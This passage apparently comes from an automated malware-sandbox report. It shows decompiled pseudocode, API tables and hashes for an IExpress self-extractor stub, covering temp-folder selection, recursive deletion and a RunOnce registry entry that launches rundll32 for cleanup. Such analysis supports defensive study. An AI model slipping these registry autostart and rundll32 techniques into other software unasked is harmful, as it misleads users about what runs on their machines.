						_t58 =  *0x1258a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\engineer\AppData\Local\Temp\IXP002.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x1258a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x1258d48 & 0x000000c0;
									if(( *0x1258d48 & 0x000000c0) == 0) {
										_t41 =  *0x1259a40; // 0x3, executed
										_t26 = E0125256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x1258a24; // 0x0
									 *0x1259a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x1258a38;
										if( *0x1258a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E01254169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x1259a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E01253BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x1258a24; // 0x0
										goto L26;
									}
								}
								_t27 = E01253B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E012544B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x1259124 = E01256285();
							goto L16;
						}
						_t59 =  *0x1259a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E0125621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x1258a24;
				if( *0x1258a24 != 0) {
					L4:
					_t34 = E01253A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E012551E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x1258a38;
				if( *0x1258a38 != 0) {
					goto L5;
				}
				goto L4;
			}

0x01252f1d
0x01252f28
0x01252f2f
0x01252f3d
0x01252f6c
0x01252f6c
0x01252f71
0x01252f73
0x01253041
0x01253041
0x01253043
0x01253053
0x01253053
0x01252f79
0x01252f80
0x00000000
0x01252f86
0x01252f86
0x01252f93
0x01252f9e
0x01252fa0
0x01252fa6
0x01252fb8
0x01252fba
0x01252fbe
0x01252fc6
0x01252fcc
0x01252fd4
0x01252fd6
0x01252fd8
0x01252fe0
0x01252fe6
0x01252fee
0x01252ff0
0x01252ff5
0x01252ff5
0x01252fee
0x01252fd4
0x01252ff8
0x01252ffe
0x01253004
0x01253017
0x0125301c
0x01253024
0x01253054
0x0125305a
0x01253065
0x01253065
0x0125306c
0x0125306e
0x01253075
0x0125307a
0x0125307a
0x0125307c
0x01253081
0x01253087
0x01253089
0x012530a1
0x012530a1
0x012530a9
0x012530ab
0x012530ad
0x012530af
0x012530af
0x012530ad
0x012530b6
0x00000000
0x0125308b
0x0125308b
0x01253091
0x00000000
0x00000000
0x01253093
0x01253098
0x0125309a
0x00000000
0x00000000
0x0125309c
0x00000000
0x0125309c
0x01253089
0x0125305c
0x01253061
0x01253063
0x00000000
0x00000000
0x00000000
0x01253063
0x0125302b
0x01253032
0x0125303c
0x00000000
0x0125303c
0x01253006
0x0125300c
0x00000000
0x00000000
0x0125300e
0x01253015
0x00000000
0x00000000
0x00000000
0x01253015
0x01252f80
0x01252f3f
0x01252f46
0x01252f5f
0x01252f5f
0x01252f64
0x01252f66
0x00000000
0x00000000
0x00000000
0x01252f66
0x01252f4f
0x00000000
0x00000000
0x01252f55
0x01252f5d
0x00000000
0x00000000
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 01252F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 01252FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 01252FC6
DecryptFileA.ADVAPI32 ref: 01252FE6
FreeLibrary.KERNEL32(00000000), ref: 01252FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0125301C

Part of subcall function 012551E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,01252F4D,?,00000002,00000000), ref: 01255201

Strings

advapi32.dll, xrefs: 01252F99
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 01252FDB, 01253017
DecryptFileA, xrefs: 01252FC0

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-2573977943
Opcode ID: f6a44e04c8ffd706ad7dff3963b14724dcd576edec168a08962f0581bb251648
Instruction ID: 558c6875233795fc85bf27e3a5469bfc5792a5e36f64543a110be8663558a7cb
Opcode Fuzzy Hash: f6a44e04c8ffd706ad7dff3963b14724dcd576edec168a08962f0581bb251648
Instruction Fuzzy Hash: 3C419631A30317DBDFB1EB7AB8C976637A8AB54794F101169DE01C2185EBB4C980CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01252390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E01252390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x1258004; // 0x958f311c
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E01256CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E01251680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E012516B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E01251680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E012516B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E012516B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E0125658A( &_v280, 0x104, 0x1251140);
								E01252390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}

0x01252398
0x0125239e
0x012523a3
0x012523a5
0x012523ae
0x012523b3
0x012524cb
0x012524d2
0x012524d3
0x012524d4
0x012524df
0x012523c2
0x012523d1
0x012523db
0x012523e4
0x012523f6
0x012523fc
0x01252401
0x00000000
0x00000000
0x00000000
0x00000000
0x01252407
0x01252407
0x01252408
0x01252411
0x0125241f
0x0125247a
0x01252483
0x01252495
0x012524a3
0x01252421
0x0125242f
0x01252453
0x0125245d
0x01252466
0x01252472
0x01252472
0x0125242f
0x012524af
0x012524b5
0x012524be
0x012524c5
0x00000000
0x012524c5

APIs

FindFirstFileA.KERNELBASE(?,01258A3A,012511F4,01258A3A,00000000,?,?), ref: 012523F6
lstrcmpA.KERNEL32(?,012511F8), ref: 01252427
lstrcmpA.KERNEL32(?,012511FC), ref: 0125243B
SetFileAttributesA.KERNEL32(?,00000080,?), ref: 01252495
DeleteFileA.KERNEL32(?), ref: 012524A3
FindNextFileA.KERNELBASE(00000000,00000010), ref: 012524AF
FindClose.KERNELBASE(00000000), ref: 012524BE
RemoveDirectoryA.KERNELBASE(01258A3A), ref: 012524C5

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 836429354-0
Opcode ID: 4c0828c2372472cb76cc47407b203cebafa55a314b6a6db89b208c51e4583f00
Instruction ID: a013549d96cce154e38a76abf19bfc0072bf4b59dc4dc0075e4f214685d29a2d
Opcode Fuzzy Hash: 4c0828c2372472cb76cc47407b203cebafa55a314b6a6db89b208c51e4583f00
Instruction Fuzzy Hash: 67318131624741EBD370DB64DCCDBEF77ACABC4315F04492DAA5587180EB7499098762

Uniqueness

Uniqueness Score: -1.00%

Function 01252BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E01252BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x125a288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x1259124 = 0;
				if(E01252CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E01252F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E012552B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x1258a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0x1259a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E01251F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x1258588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x1259124; // 0x0
				return _t7;
			}

0x01252c03
0x01252c0d
0x01252c18
0x01252c20
0x01252c2e
0x01252c32
0x01252c36
0x01252c3d
0x01252c43
0x01252c45
0x01252c47
0x01252c49
0x01252c4e
0x01252c4e
0x01252c47
0x01252c32
0x01252c20
0x01252c50
0x01252c54
0x01252c57
0x01252c64
0x01252c66
0x01252c6b
0x01252c6d
0x01252c74
0x01252c76
0x01252c7c
0x01252c7e
0x01252c87
0x01252c89
0x01252c89
0x01252c87
0x01252c7c
0x01252c74
0x01252c8e
0x01252c95
0x01252c98
0x01252c98
0x01252c9e
0x01252ca7

APIs

GetVersion.KERNEL32(?,00000002,00000000,?,01256BB0,01250000,00000000,00000002,0000000A), ref: 01252C03
GetModuleHandleW.KERNEL32(Kernel32.dll,?,01256BB0,01250000,00000000,00000002,0000000A), ref: 01252C18
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 01252C28
CloseHandle.KERNEL32(00000000,?,?,01256BB0,01250000,00000000,00000002,0000000A), ref: 01252C98

Strings

HeapSetInformation, xrefs: 01252C22
Kernel32.dll, xrefs: 01252C13

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Handle$AddressCloseModuleProcVersion
String ID: HeapSetInformation$Kernel32.dll
API String ID: 62482547-3460614246
Opcode ID: 69b9619b450db23af635d880e080f4cc0b65eafd673bde8bedc3e937b35b979c
Instruction ID: a49ddb7e8a55c238ef7bc9339709175657dfe3ad0df41ca6818687e3a5b743c9
Opcode Fuzzy Hash: 69b9619b450db23af635d880e080f4cc0b65eafd673bde8bedc3e937b35b979c
Instruction Fuzzy Hash: C811C271330317DBEBB06AF9B8CDB663B5D9B842A6B064119FF01D328ADA30DC418760

Uniqueness

Uniqueness Score: -1.00%

Function 01256F40 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01256F40() {

				SetUnhandledExceptionFilter(E01256EF0); // executed
				return 0;
			}

0x01256f45
0x01256f4d

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 01256F45

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8aa8438b17eed75e197f182f2e0029c894ca43b7945323aa0d796032aff066d0
Instruction ID: 089ba019a9847d339bab97511ddacc3ba7dca35dd437f8c1bb1373f2032cc1ee
Opcode Fuzzy Hash: 8aa8438b17eed75e197f182f2e0029c894ca43b7945323aa0d796032aff066d0
Instruction Fuzzy Hash: 959002602622004B97611B71A99E815B5915B4D542BC19564A411C5448DB7040406611

Uniqueness

Uniqueness Score: -1.00%

Function 0125202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0125202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x1258004; // 0x958f311c
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E01256CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E0125171E("wextract_cleanup2", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup2", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E0125658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x1259a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x12591e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x12591e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x12591e5);
						if(_t90 != 0) {
							 *0x1258580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\engineer\AppData\Local\Temp\IXP002.TMP\");
							E0125171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup2", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E012544B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E0125658A( &_v268, 0x104, 0x1251140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x1258530 = _t66;
				goto L23;
			}

0x0125202a
0x01252035
0x0125203c
0x01252041
0x01252050
0x0125205f
0x01252064
0x0125206f
0x0125208c
0x01252094
0x01252257
0x01252266
0x01252266
0x0125209a
0x0125209b
0x0125209d
0x012520aa
0x012520af
0x012520c9
0x012520d1
0x00000000
0x00000000
0x012520d3
0x012520da
0x00000000
0x00000000
0x00000000
0x012520da
0x012520e2
0x01252103
0x0125210e
0x01252116
0x01252122
0x01252128
0x0125212c
0x01252179
0x01252194
0x012521de
0x012521e4
0x01252256
0x01252256
0x00000000
0x01252256
0x01252196
0x01252196
0x0125219c
0x0125219f
0x0125219f
0x012521a1
0x012521a2
0x012521a6
0x012521a8
0x012521b0
0x012521b0
0x012521b2
0x012521b3
0x012521bc
0x012521c7
0x012521cb
0x012521f1
0x012521f6
0x012521fd
0x012521ff
0x012521ff
0x01252204
0x01252213
0x01252218
0x0125221d
0x0125221d
0x01252220
0x01252220
0x01252222
0x01252223
0x01252229
0x0125223d
0x01252249
0x01252250
0x00000000
0x01252250
0x012521d2
0x012521d9
0x00000000
0x012521d9
0x0125213a
0x01252141
0x01252144
0x0125214c
0x00000000
0x00000000
0x01252163
0x01252172
0x01252172
0x00000000
0x01252163
0x012520ea
0x012520f0
0x00000000

APIs

memset.MSVCRT ref: 01252050
memset.MSVCRT ref: 0125205F
RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0125208C

Part of subcall function 0125171E: _vsnprintf.MSVCRT ref: 01251750

RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 012520C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 012520EA
GetSystemDirectoryA.KERNEL32 ref: 01252103
LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01252122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 01252134
FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01252144
GetSystemDirectoryA.KERNEL32 ref: 0125215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0125218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 012521C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 012521E4
RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0125223D
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01252249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 01252250

Strings

advpack.dll, xrefs: 01252109
%s /D:%s, xrefs: 012521FF, 01252210
DelNodeRunDLL32, xrefs: 0125212E
wextract_cleanup%d, xrefs: 0125209E
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 012521A8, 01252204
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 01252082
wextract_cleanup2, xrefs: 012520A5, 012520BE, 012520F0, 01252232
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 012521F6

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
API String ID: 178549006-1526010472
Opcode ID: b92106270dda0c20d96a7eec6de011b918a1bb37c0f81f8d592fef7679a2e6e4
Instruction ID: 6ee07388e46095c952f537437b1104d51d13a05ae1b8bc60e74b51709ee5d105
Opcode Fuzzy Hash: b92106270dda0c20d96a7eec6de011b918a1bb37c0f81f8d592fef7679a2e6e4
Instruction Fuzzy Hash: 3B510475A20215EBDBB09B25ECCDFFB7B2CEB50700F004298BE05E7185DAB09D858B60

Uniqueness

Uniqueness Score: -1.00%

Function 012555A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E012555A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x1258004; // 0x958f311c
				_v8 = _t28 ^ _t110;
				_t2 = E0125468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0125468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x1259a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x1258b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x1258a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E01256517(_t82, 0x7d2, 0, E01253210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x1259a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x12591e4;
									_t40 = GetTempPathA(0x104, 0x12591e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E01251781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E01256952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0125597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E01252630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E0125658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x12591e4;
																					E01251781(0x12591e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E01255467(0x12591e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E01252630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E0125597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E01255467(0x12591e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x12591e4;
											_t70 = E01252630(0, 0x12591e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x12591e4;
												_t71 = E01255467(0x12591e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E0125597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
